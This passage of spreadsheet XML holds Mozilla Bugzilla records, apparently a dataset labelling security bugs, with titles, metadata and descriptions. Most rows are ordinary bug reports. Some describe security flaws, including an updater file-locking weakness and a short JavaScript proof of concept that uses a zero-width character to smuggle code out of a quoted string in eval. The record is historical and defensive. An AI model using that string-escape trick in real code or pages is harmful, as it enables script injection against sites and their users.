      <c r="P4145" t="inlineStr">
        <is>
          <t>[adv-main32+]</t>
        </is>
      </c>
      <c r="Q4145" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4145" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4145" t="inlineStr">
        <is>
          <t>mozilla32</t>
        </is>
      </c>
      <c r="T4145" t="n">
        <v>1</v>
      </c>
      <c r="U4145" t="n">
        <v>0</v>
      </c>
      <c r="V4145" t="n">
        <v>21</v>
      </c>
      <c r="W4145" t="inlineStr">
        <is>
          <t>Created attachment 8399630
stack
enableSPSProfilingAssertions(false)
function f() {
    for (var j = 0; j &lt; 1; ++j) {
        [][0]
    }
}
f()
$ valgrind --track-origins=yes --vex-iropt-register-updates=allregs-at-mem-access --leak-check=full --show-leak-kinds=definite --smc-check=all-non-file ./js-opt-32-dm-vg-ts-linux-ccd91b78561f --no-asmjs --ion-parallel-compile=off --ion-eager w3-reduced.js
shows an uninitialised value may have been created by a stack allocation at js::jit::Invalidate, by Valgrind. Tested on m-c rev ccd91b78561f on Linux.
My configure flags are:
CC="gcc -m32" CXX="g++ -m32" AR=ar PKG_CONFIG_LIBDIR=/usr/lib/pkgconfig sh /home/gkwong/trees/mozilla-central/js/src/configure --target=i686-pc-linux --enable-optimize=-O1 --disable-debug --enable-profiling --enable-gczeal --enable-debug-symbols --disable-tests --enable-more-deterministic --enable-valgrind --with-ccache --enable-threadsafe &lt;other NSPR options&gt;
s-s because SPS profiler bugs can be security-related, so locking prior to further analysis.
Setting needinfo? from Kannan as he has worked on SPS bugs recently.</t>
        </is>
      </c>
      <c r="X4145" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4146">
      <c r="A4146" t="n">
        <v>26966</v>
      </c>
      <c r="B4146" t="inlineStr">
        <is>
          <t>2000-02-08 10:21:37 -0800</t>
        </is>
      </c>
      <c r="C4146" t="inlineStr">
        <is>
          <t>Beta1: POP: Receive message failed</t>
        </is>
      </c>
      <c r="D4146" t="inlineStr">
        <is>
          <t>2008-07-31 01:21:41 -0700</t>
        </is>
      </c>
      <c r="E4146" t="n">
        <v>1</v>
      </c>
      <c r="F4146" t="n">
        <v>1</v>
      </c>
      <c r="G4146" t="n">
        <v>3</v>
      </c>
      <c r="H4146" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4146" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J4146" t="inlineStr">
        <is>
          <t>Backend</t>
        </is>
      </c>
      <c r="K4146" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4146" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M4146" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4146" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4146" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4146" t="inlineStr">
        <is>
          <t>[PDT+]</t>
        </is>
      </c>
      <c r="Q4146" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4146" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S4146" t="inlineStr">
        <is>
          <t>M14</t>
        </is>
      </c>
      <c r="T4146" t="n">
        <v>1</v>
      </c>
      <c r="U4146" t="n">
        <v>0</v>
      </c>
      <c r="V4146" t="n">
        <v>12</v>
      </c>
      <c r="W4146" t="inlineStr">
        <is>
          <t>Linux (2000-02-08-08 M14)
Steps:
1. Launch Messenger using the -mail option
2. From my POP account, click on Get Message, no response
3. Send a message to this POP account
4. click on Get Msg again
Actual result: I see the status showing: 
Connect: Host contacted, sending login information
No new message comes in.
Expected result: Should receive message
Waiting for win32 and Mac build.</t>
        </is>
      </c>
      <c r="X4146" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4147">
      <c r="A4147" t="n">
        <v>925747</v>
      </c>
      <c r="B4147" t="inlineStr">
        <is>
          <t>2013-10-11 07:30:34 -0700</t>
        </is>
      </c>
      <c r="C4147" t="inlineStr">
        <is>
          <t>Files extracted from Mar file are not locked during update</t>
        </is>
      </c>
      <c r="D4147" t="inlineStr">
        <is>
          <t>2024-05-30 08:08:06 -0700</t>
        </is>
      </c>
      <c r="E4147" t="n">
        <v>1</v>
      </c>
      <c r="F4147" t="n">
        <v>1</v>
      </c>
      <c r="G4147" t="n">
        <v>3</v>
      </c>
      <c r="H4147" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4147" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J4147" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K4147" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4147" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4147" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N4147" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4147" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4147" t="inlineStr">
        <is>
          <t>[reporter-external][adv-main28+][adv-esr24.4+]</t>
        </is>
      </c>
      <c r="Q4147" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4147" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4147" t="inlineStr">
        <is>
          <t>mozilla29</t>
        </is>
      </c>
      <c r="T4147" t="n">
        <v>1</v>
      </c>
      <c r="U4147" t="n">
        <v>0</v>
      </c>
      <c r="V4147" t="n">
        <v>53</v>
      </c>
      <c r="W4147" t="inlineStr">
        <is>
          <t>Files like update.manifest or *.patch files arent locked and extracted in a writeable place during an update process so it is possible to change the update process. With manipulted *.patch and update.manifest files it seems to be possible to change any files which are relative to the working directory of the updater (for example the firefox directory).
I have tested this behavoir in ff 24.0.</t>
        </is>
      </c>
      <c r="X4147" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4148">
      <c r="A4148" t="n">
        <v>333156</v>
      </c>
      <c r="B4148" t="inlineStr">
        <is>
          <t>2006-04-07 11:15:47 -0700</t>
        </is>
      </c>
      <c r="C4148" t="inlineStr">
        <is>
          <t>Requesting Testopia tree creation</t>
        </is>
      </c>
      <c r="D4148" t="inlineStr">
        <is>
          <t>2006-06-23 15:52:23 -0700</t>
        </is>
      </c>
      <c r="E4148" t="n">
        <v>1</v>
      </c>
      <c r="F4148" t="n">
        <v>1</v>
      </c>
      <c r="G4148" t="n">
        <v>5</v>
      </c>
      <c r="H4148" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4148" t="inlineStr">
        <is>
          <t>mozilla.org</t>
        </is>
      </c>
      <c r="J4148" t="inlineStr">
        <is>
          <t>CVS: Administration</t>
        </is>
      </c>
      <c r="K4148" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4148" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4148" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4148" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4148" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4148" t="inlineStr"/>
      <c r="Q4148" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4148" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4148" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4148" t="n">
        <v>1</v>
      </c>
      <c r="U4148" t="n">
        <v>0</v>
      </c>
      <c r="V4148" t="n">
        <v>4</v>
      </c>
      <c r="W4148" t="inlineStr">
        <is>
          <t>We need to have a Testopia branch (trunk or whatever the CVS equivilent is) added for the Testopia project.</t>
        </is>
      </c>
      <c r="X4148" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4149">
      <c r="A4149" t="n">
        <v>82479</v>
      </c>
      <c r="B4149" t="inlineStr">
        <is>
          <t>2001-05-23 18:13:15 -0700</t>
        </is>
      </c>
      <c r="C4149" t="inlineStr">
        <is>
          <t>HTTP Referer: for SSL page should not be sent to insecure page</t>
        </is>
      </c>
      <c r="D4149" t="inlineStr">
        <is>
          <t>2016-09-27 13:03:20 -0700</t>
        </is>
      </c>
      <c r="E4149" t="n">
        <v>1</v>
      </c>
      <c r="F4149" t="n">
        <v>1</v>
      </c>
      <c r="G4149" t="n">
        <v>6</v>
      </c>
      <c r="H4149" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4149" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J4149" t="inlineStr">
        <is>
          <t>Security: UI</t>
        </is>
      </c>
      <c r="K4149" t="inlineStr">
        <is>
          <t>1.0 Branch</t>
        </is>
      </c>
      <c r="L4149" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4149" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4149" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4149" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4149" t="inlineStr">
        <is>
          <t>PDT+; critical for 0.9.2; checked in; needs verification</t>
        </is>
      </c>
      <c r="Q4149" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4149" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4149" t="inlineStr">
        <is>
          <t>psm2.0</t>
        </is>
      </c>
      <c r="T4149" t="n">
        <v>1</v>
      </c>
      <c r="U4149" t="n">
        <v>0</v>
      </c>
      <c r="V4149" t="n">
        <v>28</v>
      </c>
      <c r="W4149" t="inlineStr">
        <is>
          <t>We need to verify that the HTTP protocol engine does NOT send a Referer: field
for HTTP requests that are initiated by links on secure pages, but which refer
to insecure servers.
This restriction was implemented in N4.X to prevent session ids and other
similar information from being transmitted to the insecure site (over
unencrypted channels) in the Referer field.</t>
        </is>
      </c>
      <c r="X4149" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4150">
      <c r="A4150" t="n">
        <v>529182</v>
      </c>
      <c r="B4150" t="inlineStr">
        <is>
          <t>2009-11-16 18:12:57 -0800</t>
        </is>
      </c>
      <c r="C4150" t="inlineStr">
        <is>
          <t>Write status page for week-in-the-life study</t>
        </is>
      </c>
      <c r="D4150" t="inlineStr">
        <is>
          <t>2016-05-10 13:13:22 -0700</t>
        </is>
      </c>
      <c r="E4150" t="n">
        <v>1</v>
      </c>
      <c r="F4150" t="n">
        <v>1</v>
      </c>
      <c r="G4150" t="n">
        <v>6</v>
      </c>
      <c r="H4150" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4150" t="inlineStr">
        <is>
          <t>Mozilla Labs Graveyard</t>
        </is>
      </c>
      <c r="J4150" t="inlineStr">
        <is>
          <t>Test Pilot</t>
        </is>
      </c>
      <c r="K4150" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4150" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4150" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4150" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4150" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4150" t="inlineStr">
        <is>
          <t>week-in-the-life</t>
        </is>
      </c>
      <c r="Q4150" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4150" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4150" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4150" t="n">
        <v>1</v>
      </c>
      <c r="U4150" t="n">
        <v>0</v>
      </c>
      <c r="V4150" t="n">
        <v>2</v>
      </c>
      <c r="W4150" t="inlineStr">
        <is>
          <t>Week in the life study needs html content for starting, in-progress, and completed.</t>
        </is>
      </c>
      <c r="X4150" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4151">
      <c r="A4151" t="n">
        <v>452385</v>
      </c>
      <c r="B4151" t="inlineStr">
        <is>
          <t>2008-08-27 02:41:45 -0700</t>
        </is>
      </c>
      <c r="C4151" t="inlineStr">
        <is>
          <t>Bookmark This Page panel hangs Firefox when -moz-border-radius is used</t>
        </is>
      </c>
      <c r="D4151" t="inlineStr">
        <is>
          <t>2008-11-13 07:12:26 -0800</t>
        </is>
      </c>
      <c r="E4151" t="n">
        <v>1</v>
      </c>
      <c r="F4151" t="n">
        <v>1</v>
      </c>
      <c r="G4151" t="n">
        <v>3</v>
      </c>
      <c r="H4151" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4151" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4151" t="inlineStr">
        <is>
          <t>Widget: Win32</t>
        </is>
      </c>
      <c r="K4151" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4151" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4151" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N4151" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4151" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4151" t="inlineStr"/>
      <c r="Q4151" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4151" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4151" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4151" t="n">
        <v>1</v>
      </c>
      <c r="U4151" t="n">
        <v>0</v>
      </c>
      <c r="V4151" t="n">
        <v>41</v>
      </c>
      <c r="W4151" t="inlineStr">
        <is>
          <t>Bookmark This Page panel hangs Firefox when -moz-border-radius is used.
In my themes I specify a rounded corner for the Bookmark This Page panel:
#editBookmarkPanel{
  padding:4px;
  min-width:24em;
  -moz-border-radius:6px 0 6px 6px}
But when the panel is openend and then closed with 'Cancel' Firefox completely hangs. One can only close it via the taskbar or task manager of Windows.
(My themes that are impacted are: LittleFox, Nautipolis, Walnut and W3v8)
I would say this is blocking FF3.1, as it is a regression and can quite easily hang or even crash FF on themes that are widely used for FF3.0 (and 2.0).
While I can remove this rounding, the overall hang of the complete application because of a CSS style rule is worrying...
This problem is not in FF3.0 (luckily!), but it is really prominent in the 3.1 nightlies.</t>
        </is>
      </c>
      <c r="X4151" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4152">
      <c r="A4152" t="n">
        <v>1170836</v>
      </c>
      <c r="B4152" t="inlineStr">
        <is>
          <t>2015-06-02 16:32:09 -0700</t>
        </is>
      </c>
      <c r="C4152" t="inlineStr">
        <is>
          <t>Importing certified themes in dev mode doesn't work</t>
        </is>
      </c>
      <c r="D4152" t="inlineStr">
        <is>
          <t>2015-07-02 23:34:28 -0700</t>
        </is>
      </c>
      <c r="E4152" t="n">
        <v>1</v>
      </c>
      <c r="F4152" t="n">
        <v>1</v>
      </c>
      <c r="G4152" t="n">
        <v>6</v>
      </c>
      <c r="H4152" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4152" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J4152" t="inlineStr">
        <is>
          <t>Gaia::Theme Editor</t>
        </is>
      </c>
      <c r="K4152" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4152" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M4152" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N4152" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4152" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4152" t="inlineStr"/>
      <c r="Q4152" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4152" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S4152" t="inlineStr">
        <is>
          <t>2.2 S14 (12june)</t>
        </is>
      </c>
      <c r="T4152" t="n">
        <v>1</v>
      </c>
      <c r="U4152" t="n">
        <v>0</v>
      </c>
      <c r="V4152" t="n">
        <v>44</v>
      </c>
      <c r="W4152" t="inlineStr">
        <is>
          <t>Steps to Reproduce:
(This is on an Aries device running the dogfood update channel)
1. Download and flash aries.zip from https://tools.taskcluster.net/task-inspector/#xRVy3KtOQdKKP1gu0quJIw/1
2. Set up the device and apply the OTA (build identifier 20150602123959, build number eng.worker.20150528.204812)
3. Reboot (should work normally)
4. Open the Studio app and attempt to enable the Solarized Light theme, then the Solarized Dark theme.
(note: tapping "enable" results in an app.zip download notification, no other action.)
5. Open WebIDE, Runtime Info, root device then request elevated privileges.
6. Reboot (should work normally)
7. Open the Studio app and attempt to enable the Solarized Light theme, then the Solarized Dark theme.
(note: this time you should see success notifications)
8. Attempt to power down or reboot the phone.
What should happen:
- The phone restarts
What actually happens:
- The screen goes black and unresponsive, but the backlight remains on and the phone does not power down or restart.
When in this state, the phone is completely unusable. I haven't managed to fix it either, short of re-flashing. It's also impossible to connect the devtools over USB, since you can't see and tap on the "accept debugging" prompt, though wifi debugging still works if you had previously connected over wifi with the "scan and remember" option.
The phone responds to adb normally, and an `adb reboot` will get it back to a semi-functional state, but attempting to power down or reboot will re-manifest the issue.
In addition to the black screen, other features are broken after step 7:
- Messages in SMS threads aren't visible.
- Rearranging icons and scrolling in the home screen's edit mode doesn't work.
If I connect with the WebIDE and inspect the system app, I can see that the black screen is the normal div#poweroff-splash, however, the animation never plays and shutdown never actually happens. Using the devtools to set its visibility to hidden allows me to see and interact with the phone as if nothing had ever happened.
[Blocking Requested - why for this release]: Renders phone unusable</t>
        </is>
      </c>
      <c r="X4152" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4153">
      <c r="A4153" t="n">
        <v>1625508</v>
      </c>
      <c r="B4153" t="inlineStr">
        <is>
          <t>2020-03-27 09:30:56 -0700</t>
        </is>
      </c>
      <c r="C4153" t="inlineStr">
        <is>
          <t>[Win] Installing the build in another location than the Program Files folder causes webrtc calls through sandbox process isolation to fail</t>
        </is>
      </c>
      <c r="D4153" t="inlineStr">
        <is>
          <t>2020-03-30 23:27:09 -0700</t>
        </is>
      </c>
      <c r="E4153" t="n">
        <v>1</v>
      </c>
      <c r="F4153" t="n">
        <v>1</v>
      </c>
      <c r="G4153" t="n">
        <v>3</v>
      </c>
      <c r="H4153" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4153" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4153" t="inlineStr">
        <is>
          <t>WebRTC: Audio/Video</t>
        </is>
      </c>
      <c r="K4153" t="inlineStr">
        <is>
          <t>76 Branch</t>
        </is>
      </c>
      <c r="L4153" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4153" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N4153" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4153" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4153" t="inlineStr"/>
      <c r="Q4153" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4153" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4153" t="inlineStr">
        <is>
          <t>mozilla76</t>
        </is>
      </c>
      <c r="T4153" t="n">
        <v>1</v>
      </c>
      <c r="U4153" t="n">
        <v>0</v>
      </c>
      <c r="V4153" t="n">
        <v>14</v>
      </c>
      <c r="W4153" t="inlineStr">
        <is>
          <t>**Affected versions**
* Latest Nightly 76.0a1
**Unaffected versions**
* Firefox 75.0b10
* Firefox 74.0
**Affected platforms**
* Windows 10 64bit
**Unaffected platforms**
* macOS 10.15
* Ubuntu 18.04 64bit
**Steps to reproduce**
1. Visit https://hangouts.google.com/ or https://www.roundee.io/
2. Join a room and allow the website to use the microphone (and camera if you have one, I did not)
3. Microphone does not work (I only could determine this if more then 1 person was in that call).
**Expected result**
* Microphone works without issues.
**Actual result**
* Microphone does not work.
**Regression range**
* First bad: 89e9e903
* Last good: 64935f92
* Pushlog: https://hg.mozilla.org/integration/autoland/pushloghtml?fromchange=64935f926183a4e3f89888db8fac62995f990fc5&amp;tochange=89e9e9039a49b607f5a7bf64c53176a455cc14d9
* Potential regressor: https://bugzilla.mozilla.org/show_bug.cgi?id=1557282. Not sure if this is the right regressor so needinfo on Bob Owen to check if this is correct or not.
**Additional notes**
* I used a jack powered earphone with a splitter for audio and mic connectors.
* I set the severity to Critical keeping in mind all that's happening now with Covid-19 and how many people are expected to use conferences. Plus we are late in the cycle, having this in beta will impact more users.
* Other services could be also affected by this issue.</t>
        </is>
      </c>
      <c r="X4153" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4154">
      <c r="A4154" t="n">
        <v>1413803</v>
      </c>
      <c r="B4154" t="inlineStr">
        <is>
          <t>2017-11-01 21:58:37 -0700</t>
        </is>
      </c>
      <c r="C4154" t="inlineStr">
        <is>
          <t>Nov 7, 2017 12.30p.m. Indonesian Time / 7.30 a.m. Greek Time: Use Rocket NON-Beta Logo instead of Rocket Beta Logo for Mobile and Desktop</t>
        </is>
      </c>
      <c r="D4154" t="inlineStr">
        <is>
          <t>2017-11-07 18:14:49 -0800</t>
        </is>
      </c>
      <c r="E4154" t="n">
        <v>1</v>
      </c>
      <c r="F4154" t="n">
        <v>1</v>
      </c>
      <c r="G4154" t="n">
        <v>5</v>
      </c>
      <c r="H4154" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4154" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J4154" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4154" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4154" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4154" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4154" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4154" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4154" t="inlineStr"/>
      <c r="Q4154" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4154" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4154" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4154" t="n">
        <v>1</v>
      </c>
      <c r="U4154" t="n">
        <v>0</v>
      </c>
      <c r="V4154" t="n">
        <v>8</v>
      </c>
      <c r="W4154" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1405320 +++
The November 7, 2017 release of Firefox Rocket will no longer be beta. In order to make it clear that it is NO LONGER a beta, please update the icon on desktop and mobile to use the Rocket NON-Beta Logo.
The Rocket NON-Beta Logo can be found here:
https://drive.google.com/drive/folders/0B1V1eo-I8g3dVnpJdlJHNUpYTzg
I believe this is just a matter of reverting the commits in:
https://bugzilla.mozilla.org/show_bug.cgi?id=1405320#c4
QUOTE of bug 1405320#c4
Commits pushed to master at https://github.com/mozilla/kitsune
https://github.com/mozilla/kitsune/commit/c57263f148fe6f77cbf2afa974795208cdb0c6b9
[fix bug 1405320] Update Rocket logo with Rocket Beta logo.
https://github.com/mozilla/kitsune/commit/083c86289aef54736127ec551c427564d23fc4e3
Merge pull request #2922 from mozilla/1405320
 [fix bug 1405320] Update Rocket logo with Rocket Beta logo.
END QUOTE</t>
        </is>
      </c>
      <c r="X4154" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4155">
      <c r="A4155" t="n">
        <v>1364601</v>
      </c>
      <c r="B4155" t="inlineStr">
        <is>
          <t>2017-05-12 15:25:27 -0700</t>
        </is>
      </c>
      <c r="C4155" t="inlineStr">
        <is>
          <t>Update on boarding fox in Activity Stream</t>
        </is>
      </c>
      <c r="D4155" t="inlineStr">
        <is>
          <t>2017-07-05 12:02:21 -0700</t>
        </is>
      </c>
      <c r="E4155" t="n">
        <v>1</v>
      </c>
      <c r="F4155" t="n">
        <v>1</v>
      </c>
      <c r="G4155" t="n">
        <v>2</v>
      </c>
      <c r="H4155" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4155" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J4155" t="inlineStr">
        <is>
          <t>Home screen</t>
        </is>
      </c>
      <c r="K4155" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4155" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M4155" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N4155" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4155" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4155" t="inlineStr">
        <is>
          <t>[mobileAS]</t>
        </is>
      </c>
      <c r="Q4155" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4155" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4155" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4155" t="n">
        <v>1</v>
      </c>
      <c r="U4155" t="n">
        <v>0</v>
      </c>
      <c r="V4155" t="n">
        <v>3</v>
      </c>
      <c r="W4155" t="inlineStr">
        <is>
          <t>The onboarding fox in Activity stream needs to be updated. 
The alignment also needs to be fixed.</t>
        </is>
      </c>
      <c r="X4155" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4156">
      <c r="A4156" t="n">
        <v>430740</v>
      </c>
      <c r="B4156" t="inlineStr">
        <is>
          <t>2008-04-24 17:42:40 -0700</t>
        </is>
      </c>
      <c r="C4156" t="inlineStr">
        <is>
          <t>BOM characters are stripped from javascript before execution</t>
        </is>
      </c>
      <c r="D4156" t="inlineStr">
        <is>
          <t>2009-03-02 00:43:27 -0800</t>
        </is>
      </c>
      <c r="E4156" t="n">
        <v>1</v>
      </c>
      <c r="F4156" t="n">
        <v>1</v>
      </c>
      <c r="G4156" t="n">
        <v>3</v>
      </c>
      <c r="H4156" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4156" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4156" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4156" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4156" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4156" t="inlineStr">
        <is>
          <t>Windows Vista</t>
        </is>
      </c>
      <c r="N4156" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4156" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4156" t="inlineStr">
        <is>
          <t>[sg:high] XSS risk to sites</t>
        </is>
      </c>
      <c r="Q4156" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4156" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4156" t="inlineStr">
        <is>
          <t>mozilla1.9.1a1</t>
        </is>
      </c>
      <c r="T4156" t="n">
        <v>1</v>
      </c>
      <c r="U4156" t="n">
        <v>0</v>
      </c>
      <c r="V4156" t="n">
        <v>75</v>
      </c>
      <c r="W4156" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506; .NET CLR 3.5.30319; WWTClient2)
Build Identifier: 2.0.0.13
Using control format unicode characters, it is possible for code that will be executed to exist inside what would otherwise appear to be a quoted javascript string. The same technique can be used to escape out of block comments.
Reproducible: Always
Steps to Reproduce:
Execute the following javascript:
function evil() {
   alert('evil');
   return 'evil';
}
alert(eval("(['a\\\u200d', '+evil()])//')]"));
Actual Results:  
alert 'evil' appears, then an aldert "a', evil"
Expected Results:  
only one alert "a\,+evil()])//" should appear.
See url for more.</t>
        </is>
      </c>
      <c r="X4156" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4157">
      <c r="A4157" t="n">
        <v>1401227</v>
      </c>
      <c r="B4157" t="inlineStr">
        <is>
          <t>2017-09-19 08:31:43 -0700</t>
        </is>
      </c>
      <c r="C4157" t="inlineStr">
        <is>
          <t>Crash in premultiply_data</t>
        </is>
      </c>
      <c r="D4157" t="inlineStr">
        <is>
          <t>2017-09-27 11:41:22 -0700</t>
        </is>
      </c>
      <c r="E4157" t="n">
        <v>1</v>
      </c>
      <c r="F4157" t="n">
        <v>1</v>
      </c>
      <c r="G4157" t="n">
        <v>3</v>
      </c>
      <c r="H4157" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4157" t="inlineStr">
        <is>
